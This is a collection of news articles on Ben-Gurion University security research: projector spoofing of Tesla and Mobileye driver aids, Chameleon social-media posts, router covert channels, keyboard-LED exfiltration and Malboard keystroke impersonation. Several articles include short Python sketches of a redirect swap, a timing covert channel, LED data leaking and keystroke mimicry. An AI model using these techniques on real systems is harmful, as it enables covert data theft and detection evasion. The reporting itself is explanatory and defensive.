
How a $300 projector can fool Tesla’s Autopilot

Semi-autonomous driving systems don’t understand projected images.

Six months ago, Ben Nassi, a PhD student at Ben-Gurion University advised by Professor Yuval Elovici, carried off a set of successful spoofing attacks against a Mobileye 630 Pro Driver Assist System using inexpensive drones and battery-powered projectors. Since then, he has expanded the technique to experiment—also successfully—with confusing a Tesla Model X and will be presenting his findings at the Cybertech Israel conference in Tel Aviv.

The spoofing attacks largely rely on the difference between human and AI image recognition. For the most part, the images Nassi and his team projected to troll the Tesla would not fool a typical human driver—in fact, some of the spoofing attacks were nearly steganographic, relying on the differences in perception not only to make spoofing attempts successful but also to hide them from human observers.

Nassi created a video outlining what he sees as the danger of these spoofing attacks, which he called “Phantom of the ADAS,” and a small website offering the video, an abstract outlining his work, and the full reference paper itself. We don’t necessarily agree with the spin Nassi puts on his work—for the most part, it looks to us like the Tesla responds pretty reasonably and well to these deliberate attempts to confuse its sensors. We do think this kind of work is important, however, as it demonstrates the need for defensive design of semi-autonomous driving systems.

Nassi and his team’s spoofing of the Model X was carried out with a human assistant holding a projector, due to drone laws in the country where the experiments were carried out. But the spoof could have also been carried out by drone, as his earlier spoofing attacks on a Mobileye driver-assistance system were.

From a security perspective, the interesting angle here is that the attacker never has to be at the scene of the attack and doesn’t need to leave any evidence behind—and the attacker doesn’t need much technical expertise. A teenager with a $400 drone and a battery-powered projector could reasonably pull this off with no more know-how than “hey, it’d be hilarious to troll cars down at the highway, right?” The equipment doesn’t need to be expensive or fancy—Nassi’s team used several $200-$300 projectors successfully, one of which was rated for only 854×480 resolution and 100 lumens.

Of course, nobody should be letting a Tesla drive itself unsupervised in the first place—Autopilot is a Level 2 Driver Assistance System, not the controller for a fully autonomous vehicle. Although Tesla did not respond to requests for comment on the record, the company’s press kit describes Autopilot very clearly (emphasis ours):

Autopilot is intended for use only with a fully attentive driver who has their hands on the wheel and is prepared to take over at any time. While Autopilot is designed to become more capable over time, in its current form, it is not a self-driving system, it does not turn a Tesla into an autonomous vehicle, and it does not allow the driver to abdicate responsibility. When used properly, Autopilot reduces a driver’s overall workload, and the redundancy of eight external cameras, radar and 12 ultrasonic sensors provides an additional layer of safety that two eyes alone would not have.

Even the name “Autopilot” itself isn’t as inappropriate as many people assume—at least, not if one understands the reality of modern aviation and maritime autopilot systems in the first place. Wikipedia references the FAA’s Advanced Avionics Handbook when it defines autopilots as “systems that do not replace human operators, [but] instead assist them in controlling the vehicle.” On the first page of the Advanced Avionics Handbook’s chapter on automated flight control, it states: “In addition to learning how to use the autopilot, you must also learn when to use it and when not to use it.”

Within these constraints, even the worst of the responses demonstrated in Nassi’s video—that of the Model X swerving to follow fake lane markers on the road—doesn’t seem so bad. In fact, that clip demonstrates exactly what should happen: the owner of the Model X—concerned about what the heck his or her expensive car might do—hit the brakes and took control manually after Autopilot went in an unsafe direction.

The problem is, there’s good reason to believe that far too many drivers don’t believe they really need to pay attention. A 2019 survey demonstrated that nearly half of the drivers polled believed it was safe to take their hands off the wheel while Autopilot is on, and six percent even thought it was OK to take a nap. More recently, Sen. Edward Markey (D-Mass.) called for Tesla to improve the clarity of its marketing and documentation, and Democratic presidential candidate Andrew Yang went hands-free in a campaign ad—just as Elon Musk did before him, in a 2018 60 Minutes segment.

The time may have come to consider legislation about drones and projectors specifically, in much the same way laser pointers were regulated after they became popular and cheap. Some of the techniques used in the spoofing attacks carried out here could also confuse human drivers. And although human drivers are at least theoretically available, alert, and ready to take over for any confused AI system today, that won’t be the case forever. It would be a good idea to start work on regulations prohibiting spoofing of vehicle sensors before we no longer have humans backing them up.

Source: Ars Technica

Did you really ‘like’ that? How Chameleon attacks spring in Facebook, Twitter, LinkedIn

Social networks impacted seem to disagree on the scope of the attack.

Social networks are full to the brim with our photos, posts, comments, and likes — the latter of which may be abused by attackers for the purposes of incrimination. 

A new paper, titled “The Chameleon Attack: Manipulating Content Display in Online Social Media,” has been published by academics from the Ben-Gurion University of the Negev (BGU), Israel, which suggests inherent flaws in social networks could give rise to a form of “Chameleon” attack. 

The team, made up of Aviad Elyashar, Sagi Uziel, Abigail Paradise, and Rami Puzis from the Telekom Innovation Laboratories and the Department of Software and Information Systems Engineering, says that weaknesses in how posting systems work on Facebook, Twitter, LinkedIn, and other social media platforms can be exploited to tamper with displayed content, turning what a user once endorsed into something “completely different, detrimental and potentially criminal.”

According to the research, published on arXiv.org, an interesting design flaw — rather than a security vulnerability, it should be noted — means that content, including posts, can be edited and changed without users who liked or commented on it being made aware of the change.

Shortened redirect links, too, commonly used for brand management and to fit character limits, are susceptible: their targets can be changed without notice.
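To make the link-switching half of this concrete, here is a minimal sketch of a self-hosted short link whose destination its operator can silently swap. Everything here (the address, port, and target URL) is a hypothetical illustration; real Chameleon posts abuse the platforms’ own posting and preview behavior rather than a toy server.

```python
# Sketch of a "chameleon" short link (illustrative only; addresses and URLs
# are hypothetical). The link embedded in the post never changes, but what
# it resolves to is entirely under the operator's control.
from http.server import BaseHTTPRequestHandler, HTTPServer

# Starts out innocuous; the operator later flips this to something else,
# and every existing "like" of the post silently follows it.
REDIRECT_TARGET = "https://example.com/cute-kitten-video"

class ShortLink(BaseHTTPRequestHandler):
    def do_GET(self):
        # A 302 redirect is resolved afresh on every visit, so nothing on
        # the social network records that the destination has changed.
        self.send_response(302)
        self.send_header("Location", REDIRECT_TARGET)
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("127.0.0.1", 8080), ShortLink).serve_forever()
```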

During experiments, the researchers used the Chameleon method to change publicly posted videos on Facebook. Comment and like counts stayed the same, but no indication of the alteration was shown to anyone who had previously interacted with the content.

“Imagine watching and ‘liking’ a cute kitty video in your Facebook feed and a day later a friend calls to find out why you ‘liked’ a video of an ISIS execution,” says Dr. Rami Puzis, a researcher in the BGU Department of Software and Information Systems Engineering. “You log back on and find that indeed there’s a ‘like’ there. The repercussions from indicating support by liking something you would never do (Biden vs. Trump, Yankees vs. Red Sox, ISIS vs. US) from employers, friends, family, or government enforcement unaware of this social media scam can wreak havoc in just minutes.”  

Scams come to mind first, but in a world where propaganda, fake news, and troll farming run rampant across social networks — the alleged interference of Russia in the previous US election being a prime example — and where our physical and digital identities are closely tied, these design weaknesses may have serious ramifications for users.

In a hypothetical attack scenario, the researchers say, a target could be selected and reconnaissance performed across a social network. Acceptable posts and links could then be created to “build trust” with an unaware victim — or group — before the switch is made via a Chameleon attack, quickly altering the content so that the target’s visible likes and comments appear to endorse something else entirely.

“First and foremost, social network Chameleons can be used for shaming or incrimination, as well as to facilitate the creation and management of fake profiles in social networks,” Puzis says. “They can also be used to evade censorship and monitoring, in which a disguised post reveals its true self after being approved by a moderator.”

When contacted by the team, Facebook dismissed any concerns, labeling the issue a phishing attack and saying that “such issues do not qualify under our bug bounty program.”

The LinkedIn team has begun an investigation. 

Both Facebook and LinkedIn, however, have a partial mitigation in place: an icon is displayed when content has been edited after publication.

Twitter said the behavior had been reported to the microblogging platform in the past: “while it may not be ideal, at this time, we do not believe this poses more of a risk than the ability to tweet a URL of any kind since the content of any web page may also change without warning.”

WhatsApp and Instagram are not generally susceptible to these attacks, whereas Reddit and Flickr may be.

“On social media today, people make judgments in seconds, so this is an issue that requires solving, especially before the upcoming US election,” Puzis says. 
 
The research will be presented in April at The Web Conference in Taipei, Taiwan. 

Source: ZDNet

Singapore undergrads cut their teeth in Israel – land of start-ups and tech

Just before a group of Singaporean students made their way to Israel in May, worry hung over their heads.

Rockets had been fired from the Gaza Strip, hitting the southern Israeli city of Beersheba, where a few of the students from the Singapore University of Technology and Design (SUTD) were headed for an internship. No injury or death was reported, but news of the missile attacks made some of the students’ families a little uneasy.

Still, with reassurance from the university, the seven students, aged 20 to 23, went ahead with the trip.

Prior to their departure, SUTD kept in touch with International SOS and held briefings for the students on developments in Israel, as well as drills in case of emergencies.

None of the students heard any rocket sirens in the four months they were there.

They were the first batch of SUTD students to experience first-hand work in Israel, dubbed the land of start-ups and technology.

The seven of them belonged to either the information systems technology and design, or engineering systems and design specialisations.

Split across two start-ups and a research lab, they spent the past four months learning what it takes to be entrepreneurs and exploring research in cyber security. Their work stint ended last month.

SUTD had earlier this year established partnerships with two renowned Israeli universities – IDC Herzliya, near Tel Aviv, and Ben-Gurion University (BGU) in Beersheba – making it the fourth Singapore university to send students to Israel for work or an exchange programme.

IN THE LAND OF CYBER DEFENCE

Israel is known for its Iron Dome, a missile defence system, but it has also been developing its cyber-security technologies.

At the forefront of these efforts is Cyber@BGU, a research lab that delves into all sorts of projects on cyber security, big data analytics and applied research across fields.

This was also where three Singaporean SUTD students had the chance to work, thanks to Professor Yuval Elovici, who wears two hats as the head of two cyber-security labs, one at SUTD and the other at Cyber@BGU.

Prof Elovici said that Beersheba, about 100km from Tel Aviv, has been named Israel’s cyber capital, and the research lab is part of a larger high-tech park with large companies and start-ups.

By next year, about 4,000 tech experts will be working in the area, and eventually, this will grow to about 10,000, when the Israeli military moves its logistics, cyber-defence and technology units to the “smart campus”.

Third-year student Kevin Yee, 23, found it exciting to be in the heart of Beersheba. His junior, Mr Suhas Sahu, 22, worked on research to streamline huge chunks of data, and speed up detection of abnormalities in network traffic. The second-year student also started writing a research paper on the project for the lab.

For second-year student Sithanathan Bhuvaneswari, 20, her project was on the detection of tampered MRI scans into which fake cancerous growths had been injected.

“Previously our only reference of cyber security was hacking in movies. But these projects about protecting identity and networks make everything more real, and it opens your eyes to the opportunities out there.”

A HOTBED FOR START-UPS

The other students were in Tel Aviv, the heart of Israel’s booming start-up scene.

Third-year student Eunice Lee, 21, was an intern at Pick a Pier, a company set up to make booking of docking spaces more efficient for marinas and boaters.

She was asked to create a smart algorithm to better match the supply of these spaces to the demand.

“I feel empowered in a start-up, where I have to be more accountable for my own work and make sure nothing goes wrong.”

She enjoyed her experience in Israel so much that she is even considering returning to work there full time after graduation.

In another part of the city, three students were based at I Know First, a fintech start-up that uses an advanced algorithm to analyse and predict the global stock market.

Their job roles included writing reports on the company’s predictive technology, comparing data with historical prices, and creating programming scripts to speed up data processing for the firm’s website.

Third-year student Jireh Tan, 23, who also helped to redesign the website, said: “I’ve always wanted to see what it’s like to work in a small environment, to really feel the responsibility of what I do every day.”

His peer Clarence Toh, 22, said: “Because start-ups are so small, you can see how they function and how they stay lean. Through this experience, I’ve seen how starting a business is not impossible, if you have a product that can meet demand.”

The Singapore University of Technology and Design (SUTD) ramped up overseas work opportunities for students in the past two years.

Overall demand to get work experience abroad has risen, with about 30 per cent more students going for overseas internships. This year, 103 students applied for 120 such positions, double the number of applicants last year.

Eventually, 47 students took up internships in 14 countries abroad this year. Some had either declined the positions offered or gone for local internships.

There is funding from SUTD and Enterprise Singapore for some internships abroad, and some companies and partners provide a small stipend, lodging, or meal and transport allowance.

Israel is one of the newest destinations for SUTD, which is Singapore’s fourth autonomous university.

SUTD president Chong Tow Chong said the university’s culture of entrepreneurship has made students more interested in start-ups.

“This has prompted us to expand our network of partnerships with start-up companies worldwide,” he said.

Eligible students who go on a four-month internship stint in Israel receive a sum of $5,400 from the Young Talent Programme grant, which is co-funded by Enterprise Singapore and the university.

The others, such as the National University of Singapore and Nanyang Technological University, have work programmes in Israel for their students, while the Singapore University of Social Sciences has shorter learning trips to the country.

Amelia Teng

Source: The Straits Times

New Cyberattack Warning For Millions Of Home Internet Routers: Report

Most routers used at home have a “guest network” feature nowadays, providing friends, visitors and contractors the option to get online without (seemingly) giving them access to the core home network. Unfortunately, a new report from researchers at Israel’s Ben-Gurion University of the Negev suggests that enabling such guest networks introduces a critical security vulnerability.

The advice from the researchers is to disable any guest networks—if you must have multiple networks at home, they warn, use separate hardware devices.

The implication isn’t that your plumber or telephone engineer might be in the employ of Iranian hackers and shouldn’t be let online—it is that the router’s architecture has a core vulnerability, one that enables contamination between its secure and less secure networks. The issue is more likely to arise through a printer or IoT device that has basic in-house access but which you don’t think has access to the internet.

Because of this contamination within the router itself, an attack on either network could open the other to data leaks or the planting of malware. This means an attack on a poorly secured guest network could allow data to be harvested from the core network and delivered to a threat actor over the internet. None of this would be caught by the software-based defensive solutions in place.

The research team exposed the vulnerability by “overcoming” the logical network isolation between the two different networks “using specially-crafted network traffic.” In this way, it was possible to make the channels “leak data between the host network and the guest network,” and the report warns that an attack is possible even where an attacker “has very limited permissions on the infected device, and even an iframe hosting malicious JavaScript code can be used for this purpose.”

The methods did not enable the researchers to pull large amounts of data, but they did break the security model and open the door. A targeted attack might only be looking for certain data, such as medical information or credentials. The vulnerability enables such an attack even where the guest network is not connected to the internet but has internal-only connectivity; the attack would then jump the fence and deliver data to the outside actor.

What this means in practice is overloading the router so that its internal performance-monitoring mechanisms, which both networks share, reveal to one network what is happening on the other. “Blocking this form of data transfer is more difficult, since it may require architectural changes to the router.” The researchers note that shared hardware resources must be made available to both networks for the router to function.
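The report does not publish attack code, but a minimal sketch of the general idea, a cross-network timing covert channel, might look like the following. All details here (the router address, ports, timing, and the plain on-off keying) are our assumptions for illustration, not the researchers’ actual technique.

```python
# Sketch of a cross-network timing covert channel (illustrative only).
import socket
import time

ROUTER = "192.168.1.1"  # hypothetical router shared by both networks
BIT_PERIOD = 0.5        # seconds per transmitted bit

def send_bits(bits):
    """Guest-network side: a 1-bit is a burst of UDP traffic that loads the
    router's shared hardware; a 0-bit is silence."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    for b in bits:
        deadline = time.time() + BIT_PERIOD
        while time.time() < deadline:
            if b:
                s.sendto(b"\x00" * 1400, (ROUTER, 9))  # "discard" port
            else:
                time.sleep(0.01)

def probe_latency():
    """Host-network side: time a TCP connection to the router's admin page."""
    start = time.time()
    try:
        socket.create_connection((ROUTER, 80), timeout=1).close()
    except OSError:
        pass
    return time.time() - start

def receive_bits(n, threshold=0.05):
    """A loaded router answers slowly, so high latency decodes as a 1-bit."""
    bits = []
    for _ in range(n):
        start = time.time()
        bits.append(1 if probe_latency() > threshold else 0)
        time.sleep(max(0.0, BIT_PERIOD - (time.time() - start)))
    return bits
```

Blocking this sort of channel is hard precisely because the signal rides on hardware both networks legitimately share, which is why the researchers argue for physically separate devices.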

The same issue impacts businesses operating multiple networks without physical network separation—but organisational network security introduces other vulnerabilities, around the number of sign-ons and differing levels of sensitivity. Air-gaps and access-point control are on a different level from what is being reported here. But with almost all popular routers now offering the convenience of guest networks, and with the researchers warning that “all of the routers surveyed—regardless of brand or price point—were vulnerable to at least some cross-network communication,” this is an issue that should concern home users first and foremost.

And while software tools can be deployed to plug some of the gaps uncovered, the researchers believe that to close the vulnerability without shutting down the functionality would require “a hardware-based solution—guaranteeing isolation between secure and non-secure network devices.” There is simply no way to guarantee security without hardware separation of the different networks.

As billions of new IoT devices are bought and connected, the level of security in our homes and businesses becomes more critical and more difficult to manage. The bottom line here is that even providing restricted access to an IoT device that might not seem to have any external connectivity could still allow that device to attack the core host network. And given that most of those IoT devices will be connected and forgotten and—dare I say it—made in China, that is an exposure.

The vendors of the tested hardware have been informed of the research findings—it remains to be seen whether any changes follow.

In the meantime, is your guest network under attack from foreign or domestic agents—should you panic and pull the plug? Of course not. But there is a vulnerability—it’s real and it has been tested and reported. The software-based network isolation used by your router, simply put, is not bulletproof and it should be. And so the advice is the same as it would be anyway—give some thought to whether a guest network is needed and to what devices and which people connect to your system.

Academics steal data from air-gapped systems via a keyboard’s LEDs

CTRL-ALT-LED technique can exfiltrate data from air-gapped systems using Caps Lock, Num Lock, and Scroll Lock LEDs.

The Caps Lock, Num Lock, and Scroll Lock LEDs on a keyboard can be used to exfiltrate data from a secure air-gapped system, academics from an Israeli university have proved.

The attack, which they named CTRL-ALT-LED, is nothing that regular users should worry about but is a danger for highly secure environments such as government networks that store top-secret documents or enterprise networks dedicated to storing non-public proprietary information.

HOW CTRL-ALT-LED WORKS

The attack requires some prerequisites, such as the malicious actor finding a way to infect an air-gapped system with malware beforehand; CTRL-ALT-LED is only an exfiltration method.

But once these prerequisites are met, the malware running on the system can make the LEDs of a USB-connected keyboard blink at rapid speeds, using a custom transmission protocol and modulation scheme to encode the transmitted data.

A nearby attacker can record these tiny light flickers, which they can decode at a later point, using the same modulation scheme used to encode it.
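As a rough illustration of the transmit side, the sketch below blinks the Caps Lock LED with simple on-off keying. The sysfs path and timing are our assumptions (the device name varies per machine, and the paper’s modulation scheme is more sophisticated); it requires root on Linux.

```python
# Sketch of LED-based exfiltration in the spirit of CTRL-ALT-LED (the sysfs
# path and plain on-off keying are our assumptions, not the paper's actual
# protocol). Run as root on Linux.
import time

# Hypothetical LED path; the real "inputN" name varies (ls /sys/class/leds/).
CAPS_LED = "/sys/class/leds/input3::capslock/brightness"
BIT_TIME = 0.02  # ~50 bit/s, slow enough for an ordinary camera to capture

def set_led(on: bool):
    with open(CAPS_LED, "w") as f:
        f.write("1" if on else "0")

def transmit(data: bytes):
    """On-off keying: each bit holds the LED on or off for BIT_TIME seconds."""
    for byte in data:
        for i in range(8):
            set_led(bool((byte >> (7 - i)) & 1))
            time.sleep(BIT_TIME)
    set_led(False)  # return to idle

transmit(b"secret")  # a camera with line of sight records the flicker
```

A receiver pointed at the keyboard then samples its recording at the same bit period and reassembles the bytes.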

The research team behind this exfiltration method says it tested the CTRL-ALT-LED technique with various optical capturing devices, such as a smartphone camera, a smartwatch’s camera, security cameras, extreme sports cameras, and even high-grade optical/light sensors.

Some attacks require an “evil maid” scenario, where the attacker needs to be physically present to record the LED flickers — using a smartphone or smartwatch.

However, other scenarios are more doable, with the attacker taking over CCTV surveillance systems that have a line of sight of the keyboard LEDs.

Keyboard LED transmissions can also be scheduled at certain intervals of the day when users aren’t around. This also makes it easier for attackers to sync recordings or place optical recorders or cameras near air-gapped targets only at the time they know the LEDs will be transmitting stolen info.

During experiments, the research team — from the Ben-Gurion University of the Negev in Israel — said it recorded exfiltration speeds of up to 3,000 bit/s per LED when using sensitive light sensors, and around 120 bit/s when using a normal smartphone camera.

Speeds varied depending on the camera’s sensitivity and its distance from the keyboard. Keyboard models didn’t play a role in exfiltration speeds, and no vendor’s keyboards were more vulnerable to this exfiltration method than others. Bit error rates in recovering the stolen data varied from an acceptable 3% to a larger 8%.
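For a sense of scale, here is our own back-of-the-envelope arithmetic on those reported speeds:

```python
# Transfer times at the reported speeds (our arithmetic, not the paper's).
for sensor, bps in [("light sensor", 3000), ("smartphone camera", 120)]:
    secs_per_kib = 1024 * 8 / bps
    print(f"{sensor}: {secs_per_kib:.0f} s per KiB, "
          f"{secs_per_kib * 1024 / 3600:.1f} h per MiB")
# light sensor: 3 s per KiB, 0.8 h per MiB
# smartphone camera: 68 s per KiB, 19.4 h per MiB
```

In other words, the channel suits small secrets such as passwords and keys far better than bulk data.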

PRIOR RESEARCH

But the technique the Ben Gurion research crew tested with modern hardware isn’t actually new. A research paper published in 2002 first warned that data exfiltration via keyboard LEDs was technically possible.

Furthermore, the same Ben Gurion team has been behind similar research in the past: LED-it-GO, an exfiltration technique that uses hard drive LEDs, and xLED, a similar method that exfiltrates data from routers and switches using their status lights.

As stated at the beginning, regular users have nothing to fear from this technique; malware usually has far better and faster methods of stealing data from infected computers. It is administrators of air-gapped networks who need to take it into consideration.

The Ben-Gurion team listed various countermeasures against this attack in their white paper, titled “CTRL-ALT-LED: Leaking Data from Air-Gapped Computers Via Keyboard LEDs.”

The research team will present their findings next week, on July 18, at the COMPSAC conference, held in Milwaukee, Wisconsin, USA.

Source: ZDNet

Signs from above: Drone with projector successfully trolls car AI

If the cars and the drones ever band together against us, we’re in trouble.

After a recent demo using GNSS spoofing confused a Tesla, a researcher from Cyber@BGU reached out about an alternative bit of car tech foolery. The Cyber@BGU team recently demonstrated an exploit against a Mobileye 630 PRO Advanced Driver Assist System (ADAS) installed on a Renault Captur, and the exploit relies on a drone with a projector faking street signs.

The Mobileye is a Level 0 system, which means it informs a human driver but does not automatically steer, brake, or accelerate the vehicle. This unfortunately limits the “wow factor” of Cyber@BGU’s exploit video—in the clip, we can see the Mobileye incorrectly inform its driver that the speed limit has jumped from 30km/h to 90km/h (18.6 to 55.9 mph), but we don’t get to see the Renault take off like a scalded dog in the middle of a college campus. It’s still a sobering demonstration of all the ways tricky humans can mess with immature, insufficiently trained AI.

A Renault Captur, equipped with a Mobileye 630 Pro ADAS, is driven down a narrow university street. When a drone projects a fake speed limit sign on a building, the Mobileye 630 notifies its human driver that the speed limit has changed.

Ben Nassi, a PhD student at BGU and a member of the team spoofing the ADAS, created both the video and a page succinctly laying out the security-related questions raised by this experiment. The detailed academic paper the university group prepared goes further in interesting directions than the video—for instance, the Mobileye ignored signs of the wrong shape, but the system turned out to be perfectly willing to accept signs of the wrong color and size. Even more interestingly, 100ms of display time was enough to spoof the ADAS, even though that’s brief enough that many humans wouldn’t spot the fake sign at all. The Cyber@BGU team also tested the influence of ambient light on false detections: it was easier to spoof the system late in the afternoon or at night, but attacks were reasonably likely to succeed even in fairly bright conditions.

Spoofing success rate at various levels of ambient light. Roughly speaking, the range shown here is twilight on the left to noon on a cloudy day at the right.

Ars reached out to Mobileye for response and sat in on a conference call this morning with senior company executives. The company does not believe that this demonstration counts as “spoofing”—they limit their own definition of spoofing to inputs that a human would not be expected to recognize as an attack at all (I disagreed with that limited definition but stipulated it). We can call the attack whatever we like, but at the end of the day, the camera system accepted a “street sign” as legitimate that no human driver ever would. This was the impasse the call could not get beyond. The company insisted that there was no exploit here, no vulnerability, no flaw, and nothing of interest. The system saw an image of a street sign—good enough, accept it and move on.

To be completely fair to Mobileye, again, this is just a level 0 ADAS. There’s very little potential here for real harm given that the vehicle is not meant to operate autonomously. However, the company doubled down and insisted that this level of image recognition would also be sufficient in semi-autonomous vehicles, relying only on other conflicting inputs (such as GPS) to mitigate the effects of bad data injected visually by an attacker. Cross-correlating input from multiple sensor suites to detect anomalies is good defense in depth, but even defense in depth may not work if several of the layers are tissue-thin.

This isn’t the first time we’ve covered the idea of spoofing street signs to confuse autonomous vehicles. Notably, a project in 2017 played with using stickers in an almost-steganographic way: alterations that appeared to be innocent weathering or graffiti to humans could alter the meaning of the signs entirely to AIs, which may interpret shape, color, and meaning differently than humans do.

However, there are a few new factors in BGU’s experiment that make it interesting. No physical alteration of the scenery is required; this means no chain of physical evidence, and no human needs to be on the scene. It also means setup and teardown time amounts to “how fast does your drone fly?” which may even make targeted attacks possible—a drone might acquire and shadow a target car, then wait for an optimal time to spoof a sign in a place and at an angle most likely to affect the target with minimal “collateral damage” in the form of other nearby cars also reading the fake sign. Finally, the drone can operate as a multi-pronged platform—although BGU’s experiment involved a visual projector only, a more advanced attacker might combine GNSS spoofing and perhaps even active radar countermeasures in a very serious bid at confusing its target.

Source: Ars Technica

New computer attack mimics user’s keystroke characteristics and evades detection

Ben-Gurion University of the Negev (BGU) cyber security researchers have developed a new attack called Malboard. Malboard evades several detection products that are intended to continuously verify the user’s identity based on personalized keystroke characteristics.

The new paper, “Malboard: A Novel User Keystroke Impersonation Attack and Trusted Detection Framework Based on Side-Channel Analysis,” published in the journal Computers & Security, reveals a sophisticated attack in which a compromised USB keyboard automatically generates and sends malicious keystrokes that mimic the attacked user’s behavioral characteristics.

Keystrokes generated maliciously do not typically match human typing and can easily be detected. Using artificial intelligence, however, the Malboard attack autonomously generates commands in the user’s style, injects the keystrokes as malicious software into the keyboard and evades detection. The keyboards used in the research were products by Microsoft, Lenovo and Dell.
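For intuition: keystroke-dynamics products profile the timing of a user’s typing, so an impersonator must reproduce that timing. Below is a sketch of the idea; the profile numbers are hypothetical, and Malboard’s actual models are learned with AI from the victim’s typing and injected by the compromised keyboard itself.

```python
# Sketch of keystroke-timing impersonation (illustrative; the profile values
# are hypothetical, and Malboard's real models are AI-generated and injected
# as USB HID events by a compromised keyboard).
import random
import time

# Per-user profile: mean and standard deviation, in seconds, of dwell time
# (how long a key is held) and flight time (gap between consecutive keys).
PROFILE = {"dwell": (0.085, 0.020), "flight": (0.120, 0.045)}

def humanlike_keystrokes(text: str, profile: dict):
    """Yield (char, dwell, flight) with timings drawn from the victim's
    distributions, so the rhythm matches what verifiers such as KeyTrac or
    TypingDNA expect from that user."""
    for ch in text:
        dwell = max(0.01, random.gauss(*profile["dwell"]))
        flight = max(0.0, random.gauss(*profile["flight"]))
        yield ch, dwell, flight

for ch, dwell, flight in humanlike_keystrokes("dir C:\\secrets", PROFILE):
    # A real implant would emit key-down/key-up events here.
    time.sleep(dwell + flight)
```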

“In the study, 30 people performed three different keystroke tests against three existing detection mechanisms including KeyTrac, TypingDNA and DuckHunt. Our attack evaded detection in 83 percent to 100 percent of the cases,” says Dr. Nir Nissim, head of the David and Janet Polak Family Malware Lab at Cyber@BGU, and a member of the BGU Department of Industrial Engineering and Management. “Malboard was effective in two scenarios: by a remote attacker using wireless communication to communicate, and by an inside attacker or employee who physically operates and uses Malboard.”

New Detection Modules Proposed

Both the attack and detection mechanisms were developed as part of the master’s thesis of Nitzan Farhi, a BGU student and member of the USBEAT project at BGU’s Malware Lab.

“Our proposed detection modules are trusted and secured, based on information that can be measured from side-channel resources, in addition to data transmission,” Farhi says. “These include (1) the keyboard’s power consumption; (2) the keystrokes’ sound; and (3) the user’s behavior associated with his or her ability to respond to typographical errors.”

Dr. Nissim adds, “Each of the proposed detection modules is capable of detecting the Malboard attack in 100 percent of the cases, with no misses and no false positives. Using them together as an ensemble detection framework will assure that an organization is immune to the Malboard attack as well as other keystroke attacks.”

The researchers propose using this detection framework for every keyboard when it is initially purchased, and daily at startup, since sophisticated malicious keyboards can delay their malicious activity until a later period. Many new attacks can detect the presence of security mechanisms and thus manage to evade or disable them.

The BGU researchers plan to expand the work to other popular USB devices, examining a computer mouse’s movements, clicks and duration of use. They also plan to enhance the typo-insertion detection module and combine it with other existing keystroke dynamics mechanisms for user authentication, since this behavior is difficult to replicate.

Source: Tech Xplore

Should cyber-security be more chameleon, less rhino?

Do we need to rethink our approach to cybersecurity?

Billions are being lost to cyber-crime each year, and the problem seems to be getting worse. So could we ever create unhackable computers beyond the reach of criminals and spies? Israeli researchers are coming up with some interesting solutions.

The key to stopping the hackers, explains Neatsun Ziv, vice president of cyber-security products at Tel Aviv-based Check Point Software Technologies, is to make hacking unprofitable.

“We’re currently tracking 150 hacking groups a week, and they’re making $100,000 a week each,” he tells the BBC.

“If we raise the bar, they lose money. They don’t want to lose money.”

This means making it difficult enough for hackers to break in that they choose easier targets.

And this has been the main principle governing the cyber-security industry ever since it was invented – surrounding businesses with enough armour plating to make it too time-consuming for hackers to drill through. The rhinoceros approach, you might call it.

But some think the industry needs to be less rhinoceros and more chameleon, camouflaging itself against attack.


The six generations of cyber-attacks


1991: Floppy discs are infected with malicious software that attacks any PC they are inserted into

1994: Attackers access company intranets to steal data

1997: Hackers fool web servers into giving them access, exploiting server vulnerabilities

2006: Attackers start finding “zero-day” – previously unknown – bugs in all types of commonly-used software and use them to sneak into networks or send malware disguised as legitimate file attachments

2016: Hackers use multi-pronged attacks, combining worms and ransomware, powerful enough to attack entire networks at once

2019: Hackers start attacking internet-of-things (IoT) connected devices.

Source: Check Point Software Technologies


“We need to bring prevention back into the game,” says Yuval Danieli, vice president of customer services at Israeli cyber-security firm Morphisec.

“Most of the world is busy with detection and remediation – threat hunting – instead of preventing the cyber-attack before it occurs.”

Morphisec – born out of research done at Ben-Gurion University – has developed what it calls “moving target security”. It’s a way of scrambling the names, locations and references of each file and software application in a computer’s memory to make it harder for malware to get its teeth into your system.

The mutation occurs each time the computer is turned on so the system is never configured the same way twice. The firm’s tech is used to protect the London Stock Exchange and Japanese industrial robotics firm Yaskawa, as well as bank and hotel chains.

But the most effective way to secure a computer is to isolate it from local networks and the internet completely – so-called air gapping. You would need to gain physical access to the computer to steal data.


Yuval Elovici, head of the cyber-security research centre at Ben-Gurion University, warns that even this method isn’t 100% reliable.

“The obvious way to attack an air-gapped machine is to compromise it during the supply chain when it is being built,” he says.

“So you then have a compromised air-gapped computer in a nuclear power station that came with the malware – the attacker never has to enter the premises.”

Indeed, in October last year, Bloomberg Businessweek alleged that Chinese spies had managed to insert chips on servers made in China that could be activated once the machines were plugged in overseas. The servers were manufactured for US firm Super Micro Computer Inc.

The story suggested that Amazon Web Services (AWS) and Apple were among 30 companies, as well as government agencies and departments, that had used the suspect servers.

Apple and Amazon strenuously denied the claims.

While air gapping is impractical for many businesses, so-called “co-operative cyber-security” is being seen as another way to thwart the hackers.

Imagine there are four firms working together: Barclays, Microsoft, Google and a cyber-security company, say.

Each of the four firms gives a piece of data to the others. They don’t know what the data is that they are protecting, but they hold it in their networks.

In order to access sensitive information from any of the firms, attackers would need to hack all four networks and work out which piece of data is missing, to be able to make any sense of the files stolen.

“If the likelihood of breaking into a single network is 1%, then to penetrate four different networks, the likelihood would become 0.000001%,” explains Alon Cohen, founder of cyber-security firm nsKnox and former chief technology officer for the Israeli military.


He calls the concept “crypto-splitting”, and it involves encoding each sequence of data as thousands of numbers then dividing these cryptographic puzzles between the four companies.

“You would need to solve thousands of puzzles in order to put the data back together,” says Mr Cohen.
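The company’s exact scheme isn’t described here, but the all-or-nothing idea can be illustrated with simple XOR secret sharing (our sketch of the general concept, not nsKnox’s implementation):

```python
# Sketch of all-or-nothing data splitting via XOR secret sharing
# (our illustration of the general idea; not nsKnox's actual scheme).
import os
from functools import reduce

def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def split(secret: bytes, parties: int = 4) -> list:
    """Each share alone is indistinguishable from random noise; an attacker
    must breach ALL holders to learn anything about the secret."""
    shares = [os.urandom(len(secret)) for _ in range(parties - 1)]
    shares.append(reduce(xor_bytes, shares, secret))
    return shares

def combine(shares: list) -> bytes:
    return reduce(xor_bytes, shares)

shares = split(b"payment instruction #4711")
assert combine(shares) == b"payment instruction #4711"
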